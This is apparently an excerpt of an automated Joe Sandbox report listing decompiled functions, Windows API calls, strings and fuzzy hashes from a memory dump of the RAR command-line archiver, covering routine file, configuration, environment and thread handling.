                                                                                                                                                                                                                                                control_flow_graph 1894 7ff60e5e1e80-7ff60e5e1ebb call 7ff60e61a5a0 1897 7ff60e5e1ebd-7ff60e5e1ec1 1894->1897 1898 7ff60e5e1ec8 1894->1898 1897->1898 1900 7ff60e5e1ec3-7ff60e5e1ec6 1897->1900 1899 7ff60e5e1ecb-7ff60e5e1f57 CreateFileW 1898->1899 1901 7ff60e5e1fcd-7ff60e5e1fd1 1899->1901 1902 7ff60e5e1f59-7ff60e5e1f76 GetLastError call 7ff60e5f4534 1899->1902 1900->1899 1904 7ff60e5e1fd3-7ff60e5e1fd7 1901->1904 1905 7ff60e5e1ff7-7ff60e5e200f 1901->1905 1911 7ff60e5e1fba 1902->1911 1912 7ff60e5e1f78-7ff60e5e1fb6 CreateFileW GetLastError 1902->1912 1904->1905 1907 7ff60e5e1fd9-7ff60e5e1ff1 SetFileTime 1904->1907 1908 7ff60e5e2011-7ff60e5e2022 call 7ff60e60a9e8 1905->1908 1909 7ff60e5e2027-7ff60e5e204b call 7ff60e61a610 1905->1909 1907->1905 1908->1909 1916 7ff60e5e1fbf-7ff60e5e1fc1 1911->1916 1912->1901 1915 7ff60e5e1fb8 1912->1915 1915->1916 1916->1901 1917 7ff60e5e1fc3 1916->1917 1917->1901
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1999340476-0
                                                                                                                                                                                                                                                • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                                                • Instruction ID: 0bc413714bf1c786b632f5b9a9808da9cd53d38bb4668ee6106e7639af2886bd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97417972A29AA106FB698B24E5147B96B90A7647B8F200734FE7D837C4DF7DC4458B40

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: swprintf
                                                                                                                                                                                                                                                • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                                                                                                • API String ID: 233258989-2235180025
                                                                                                                                                                                                                                                • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                                • Instruction ID: 30a9fb50a377ec2df98f04e361a7b01a2a8834ec228326b1cafef9269ecbd12a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E41F625B2C66281FB21DB61E4601FA23A0FF647A4F600935FA5D87AD6EF7DD502C300

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                                                                                                                                                                • String ID: rar.lng
                                                                                                                                                                                                                                                • API String ID: 553376247-2410228151
                                                                                                                                                                                                                                                • Opcode ID: 39970e7c6d0227ca57f33f9c031fdb4e3bcfaef39f08ad794915361c5ea6dedb
                                                                                                                                                                                                                                                • Instruction ID: 16b7865f4ec589de1fc779c41f18c377edb57e66dd3f383cfbd4b9209f2b2dea
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39970e7c6d0227ca57f33f9c031fdb4e3bcfaef39f08ad794915361c5ea6dedb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3841E525E2C6B345FA22AB60B8212B923A19F75754F380936F91EC73D7CE3EE4058700

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SHGetMalloc.SHELL32(?,00000800,?,00007FF60E5F4432,?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5F40C4
                                                                                                                                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5F40DF
                                                                                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32 ref: 00007FF60E5F40F1
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E5E3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF60E5F413F,?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5E34A0
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E5E3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF60E5F413F,?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5E34D5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                                                                                                • String ID: WinRAR
                                                                                                                                                                                                                                                • API String ID: 977838571-3970807970
                                                                                                                                                                                                                                                • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                                • Instruction ID: 2bcb59c45a89621f0a016c044b765cec805bcb05ee723976baaee7f0161fbd3b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5021C322B08B5280FA519F22F8501BB5360EFA9BD0F281031FF5E87366DE3DD4448700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF60E623CEF,?,?,00000000,00007FF60E623CAA,?,?,00000000,00007FF60E623FD9), ref: 00007FF60E6297A5
                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF60E623CEF,?,?,00000000,00007FF60E623CAA,?,?,00000000,00007FF60E623FD9), ref: 00007FF60E629807
                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF60E623CEF,?,?,00000000,00007FF60E623CAA,?,?,00000000,00007FF60E623FD9), ref: 00007FF60E629841
                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF60E623CEF,?,?,00000000,00007FF60E623CAA,?,?,00000000,00007FF60E623FD9), ref: 00007FF60E62986B
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1557788787-0
                                                                                                                                                                                                                                                • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                                                • Instruction ID: 511d2f45b14417eef6a4c0a0b335ec5ed67100abc57000eb17ae11e1d2abb17d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7213431E28B6181D6608F12B44012966A4FFF4BD0F6C4539FE9EA7B94DF3CD8519744
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2244327787-0
                                                                                                                                                                                                                                                • Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                                                                                                • Instruction ID: 16f868a57f794c0a6445cf4198f90b18749fe04d0ad72df352049c2a5e18312f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF21C321E19E7681FA698B21E21037963A0BF65B94F300931FA5DCB7C4EE3ED444C701
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: AFUM$default.sfx
                                                                                                                                                                                                                                                • API String ID: 0-2491287583
                                                                                                                                                                                                                                                • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                                                • Instruction ID: 79da780f3aed4518d4d23a9d9b4b9f438f7f1e4bf4eca4a70abda0d8e1c767df
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A581D929E0C6B240FF729B1191602BD22A1AF71794F648831FEADC76D6DF7EA485C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                                • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                                • Instruction ID: d7361b289c2cc438789d347fdd5372c1e7e9c3d72a334cb9959fbb4160709ab1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB21B672A28B6241EB608B25F49013D2655EB75774F341339FA6E867D4CE38DC81E342
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                                                                                                • String ID: CreateThread failed
                                                                                                                                                                                                                                                • API String ID: 1217111108-3849766595
                                                                                                                                                                                                                                                • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                                • Instruction ID: f8c0fb2b260e7ded1a6eedddfd79113baf3101136f7e38510412ec666377d435
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32119132A28A6282EB15EB20F8501BA7370FBA4794F648531F69D83669DF3CE546D700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3094578987-0
                                                                                                                                                                                                                                                • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                                • Instruction ID: 8f69bee09e6639f1d5285733a4c6833c1994566eaa0b6a838be23eb9603b7b4b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99F08622628B6683DA609F21F54407D6360FF99B98F244230FE9D47669DF2CD5499B00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
